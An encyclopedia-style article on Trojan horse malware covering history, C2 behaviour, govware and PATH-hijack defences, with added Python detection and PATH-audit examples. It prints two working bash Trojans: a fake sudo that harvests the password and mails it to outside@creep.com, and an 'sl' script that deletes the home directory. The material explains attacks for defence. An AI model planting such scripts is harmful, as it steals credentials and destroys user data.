Trojan horse (computing)

In computing, a Trojan horse (or simply Trojan) is any malware that misleads users about its true intent by disguising itself as an ordinary, legitimate program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. [1]

Trojans are generally spread by some form of social engineering: for example, a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then gain unauthorized access to the affected computer. [2] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. [3]

Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both: it warns that one may not change the owner of a file with the set-user-ID bit on, since otherwise one could create Trojan Horses able to misuse other users' files. [4]

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. [5]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", [6] subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. [7] [8]

Behavior

Once installed, Trojans may perform a range of malicious actions. Many contact one or more command-and-control (C2) servers across the Internet and await instructions. Since a given Trojan typically uses a specific set of ports for this communication, it can be relatively simple to detect by monitoring network traffic. Moreover, other malware could potentially "take over" the Trojan, using its open backdoor as a proxy for malicious action. [9]
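The two detection ideas in the paragraph above, written out as an added example (this is not code from the original article). The first is the signature-style check the text describes: connections to destination ports a known Trojan uses. The second is a behavioural check that does not depend on the port: a Trojan polling its C2 server for instructions produces connections at nearly constant intervals, which human-driven traffic does not. The connection records and the port list below are constructed for the example; a real deployment would read records from a firewall or EDR log and load indicator ports from threat intelligence.

```python
"""Spotting a Trojan's command-and-control (C2) traffic in connection records.

Added example, not code from the original article. The records and the port
list are constructed; the IP addresses are documentation ranges.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed outbound connection records:
# (seconds since start of capture, process, destination IP, destination port)
SAMPLE_CONNECTIONS = [
    (0, "writer", "203.0.113.10", 443),           # one-off update check: benign
    (5, "svchost_helper", "198.51.100.7", 6667),  # beacons every ~60 s
    (65, "svchost_helper", "198.51.100.7", 6667),
    (124, "svchost_helper", "198.51.100.7", 6667),
    (186, "svchost_helper", "198.51.100.7", 6667),
    (245, "svchost_helper", "198.51.100.7", 6667),
    (3, "browser", "203.0.113.20", 443),          # human-driven, irregular: benign
    (40, "browser", "203.0.113.20", 443),
    (41, "browser", "203.0.113.20", 443),
    (300, "browser", "203.0.113.20", 443),
    (301, "browser", "203.0.113.20", 443),
    (10, "updater", "198.51.100.9", 443),         # beacons every ~300 s over 443
    (310, "updater", "198.51.100.9", 443),
    (611, "updater", "198.51.100.9", 443),
    (909, "updater", "198.51.100.9", 443),
]

# Ports treated as Trojan indicators. Assumed for this example only; a real
# deployment would take these from threat intelligence, not hard-code them.
SUSPICIOUS_PORTS = {6667, 27374, 31337}


def find_port_hits(connections, ports=SUSPICIOUS_PORTS):
    """Signature check: every (process, ip, port) that used a listed port."""
    return sorted({(p, ip, port) for _, p, ip, port in connections if port in ports})


def find_beacons(connections, min_samples=4, max_cv=0.1):
    """Behavioural check: peers contacted at nearly constant intervals.

    Groups records by (process, ip, port), computes the gaps between
    successive connections and flags groups whose coefficient of variation
    (stdev / mean) is below max_cv. A timer is regular; a person is not.
    """
    by_peer = defaultdict(list)
    for ts, proc, ip, port in connections:
        by_peer[(proc, ip, port)].append(ts)
    beacons = []
    for peer, stamps in by_peer.items():
        if len(stamps) < min_samples:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period < max_cv:
            beacons.append({"peer": peer, "period": period, "count": len(stamps)})
    return sorted(beacons, key=lambda b: b["peer"])


if __name__ == "__main__":
    print("port hits:", find_port_hits(SAMPLE_CONNECTIONS))
    for b in find_beacons(SAMPLE_CONNECTIONS):
        print("beacon: %s every %.0f s (%d connections)"
              % (b["peer"], b["period"], b["count"]))
```

The constructed "updater" process shows the caveat a practitioner would raise against port-based detection alone: it beacons over port 443, so the port check misses it, while the interval check still flags it alongside the 6667 beacon.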

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically Trojan software used to intercept communications from the target computer. Some countries, such as Switzerland and Germany, have a legal framework governing the use of such software. [10] [11] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer [12] and the German "state Trojan" nicknamed R2D2. [10] The German govware works by exploiting security vulnerabilities unknown to the general public and capturing smartphone data before it is encrypted by other applications on the device. [13]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans are related to worms in that they are often spread with the help of worms, travelling across the internet with them. [14] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. [15]

Recent research has also examined the Trojan horse method as an attack on cloud computing systems. A Trojan attack on a cloud system tries to insert an application or service that alters or halts the functionality of cloud services. If the cloud platform accepts the attack as legitimate, the service or application is run and can damage and infect the cloud system. [16]

Linux sudo example

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. [17] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script, named sudo, in a publicly writable directory (e.g., /tmp). If an administrator happens to be in that directory and types sudo, and the administrator's PATH searches the current directory before the system directories, then the Trojan runs instead of the real sudo and captures the administrator's password. [18]

#!/usr/bin/env bash

# Turn off the character echo to the screen. sudo does this to prevent the
# user's password from appearing on screen when they type it in.
stty -echo

# Prompt the user for a password and then read the input. To disguise the
# nature of this malicious version, do this 3 times to imitate the behavior
# of sudo when a user enters the wrong password.
prompt_count=1
while [ "$prompt_count" -le 3 ]; do
    echo -n "[sudo] password for $(whoami): "
    read -r password_input
    echo
    sleep 3  # sudo will pause between repeated prompts
    prompt_count=$((prompt_count + 1))
done

# Turn the character echo back on.
stty echo

# Send the captured password to the attacker.
echo "$password_input" | mail -s "$(whoami)'s password" outside@creep.com

# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm -- "$0"
exit 1  # sudo returns 1 with a failed password attempt

To prevent a sudo Trojan horse of this kind, place the . entry at the tail end of the PATH environment variable, so that the system directories are searched before the current directory. [18] For example: PATH=/usr/local/bin:/usr/bin:. (better still, omit . altogether, as the next example shows).

Linux ls example

Having . somewhere in the PATH is convenient, but there is a catch. [19] Another example is the following malicious version of the Linux ls command. However, the file is not named ls; it is named sl, anticipating a common typo of ls. An attacker would place this script in a publicly writable directory (e.g., /tmp). Because no real sl command is normally installed, putting . at the end of the PATH does not help here: the typo still resolves to ./sl.

#!/usr/bin/env bash

# Remove the user's home directory, then remove self.
rm -fr ~ 2>/dev/null
rm -- "$0"

To defeat a malicious programmer who anticipates this common typing mistake, either:

  1. omit . from the PATH entirely, or
  2. alias sl=ls [note 1]
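The PATH behaviour behind both the sudo example and the sl example, as an added example (not code from the original article). It models the shell's left-to-right command search against a constructed, in-memory picture of a host (the directory contents and mode bits are assumptions for the example), so it runs offline and deterministically, and it includes the check a practitioner would actually run: an audit of PATH for entries that let another local user plant a command. audit_real_path() applies that audit to the machine it runs on.

```python
"""How PATH lookup lets a planted script hijack a command, and how to check for it.

Added example, not code from the original article. FAKE_FS is a constructed
host; audit_real_path() is the only function that touches the real system.
"""
import os
import stat

# Constructed host: which executables live in which directory, and each
# directory's mode bits. /tmp is world-writable (mode 1777), which is where
# the article's attacker drops the fake "sudo" and the "sl" typo trap.
FAKE_FS = {
    "/usr/local/bin": {"files": set(), "mode": 0o755},
    "/usr/bin": {"files": {"sudo", "ls"}, "mode": 0o755},
    "/tmp": {"files": {"sudo", "sl"}, "mode": 0o1777},
}


def resolve_command(name, path_value, cwd, fs=FAKE_FS, aliases=None):
    """Return the file the shell would execute for `name`, or None.

    Aliases are expanded first (as a shell does); then PATH entries are tried
    in order, with '' and '.' both meaning the current working directory.
    """
    name = (aliases or {}).get(name, name)
    for entry in path_value.split(":"):
        directory = cwd if entry in ("", ".") else entry
        if name in fs.get(directory, {}).get("files", ()):
            return directory.rstrip("/") + "/" + name
    return None


def audit_path(path_value, fs=FAKE_FS):
    """List PATH entries that let another local user plant a command.

    Flags '' and '.' (the current directory, including a trailing ':' in
    PATH), relative entries, and absolute entries that are world-writable.
    """
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry, "current directory is searched"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry, resolved against the current directory"))
        elif entry in fs and fs[entry]["mode"] & stat.S_IWOTH:
            findings.append((entry, "world-writable directory"))
    return findings


def audit_real_path(path_value=None):
    """Run audit_path() against the live filesystem of this machine."""
    path_value = os.environ.get("PATH", "") if path_value is None else path_value
    fs = {}
    for entry in path_value.split(":"):
        if entry.startswith("/") and os.path.isdir(entry):
            fs[entry] = {"files": set(), "mode": os.stat(entry).st_mode}
    return audit_path(path_value, fs)


if __name__ == "__main__":
    cwd = "/tmp"  # the administrator happens to be in the attacker's directory
    print("PATH=.:/usr/bin  sudo ->", resolve_command("sudo", ".:/usr/bin", cwd))
    print("PATH=/usr/bin:.  sudo ->", resolve_command("sudo", "/usr/bin:.", cwd))
    print("PATH=/usr/bin:.  sl   ->", resolve_command("sl", "/usr/bin:.", cwd))
    print("same, alias sl=ls     ->",
          resolve_command("sl", "/usr/bin:.", cwd, aliases={"sl": "ls"}))
    print("findings:", audit_path("/usr/local/bin:/usr/bin:."))
    print("this machine:", audit_real_path())
```

Moving . to the end protects sudo, because /usr/bin/sudo is found first, but sl still resolves to /tmp/sl since no system directory holds a file of that name; only dropping . or defining the alias closes that hole. An empty entry (a leading, trailing or doubled colon) is the same hole as . and is easy to miss by eye, which is why the audit flags it.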

Notable examples

Private and governmental

Publicly available

Detected by security researchers

Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. [30] [31]

References

  1. "Trojan Horse Definition" . Retrieved April 5, 2012. Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.
  2. "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  3. "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  4. Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF). p. 5. Retrieved March 28, 2020. Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.
  5. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II, archived from the original (PDF) on July 9, 2011, retrieved December 24, 2017
  6. Ken Thompson (1984). "Reflections on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi: 10.1145/358198.358210.
  7. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  8. Karger and Schell wrote that Thompson added this reference in a later version of his Turing lecture: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  9. Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute . Retrieved May 10, 2021.
  10. Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  12. Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld . Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  13. "German federal police use trojan virus to evade phone encryption". DW . Retrieved April 14, 2018.
  14. "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender . Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  15. Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  16. Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). "Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning". International Journal of Interactive Mobile Technologies (IJIM). 16 (24): 81–106. doi: 10.3991/ijim.v16i24.35763 . ISSN   1865-7923.
  17. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN   0-8104-6267-2.
  18. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 43. ISBN   0-8104-6267-2. The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.
  19. "What's wrong with having '.' in your $PATH?". Penn Engineering. Retrieved November 28, 2023. [I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.
  20. Kulakow, Seth (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute. Retrieved May 10, 2021.
  21. "Mega-Panzer". SourceForge. September 21, 2016.
  22. "Mini-Panzer". SourceForge. September 18, 2016.
  23. "What is Sova virus?". India Today.
  24. "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
  26. "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
  27. "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. Tech Times (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

Notes

  1. Place the alias statement in /etc/profile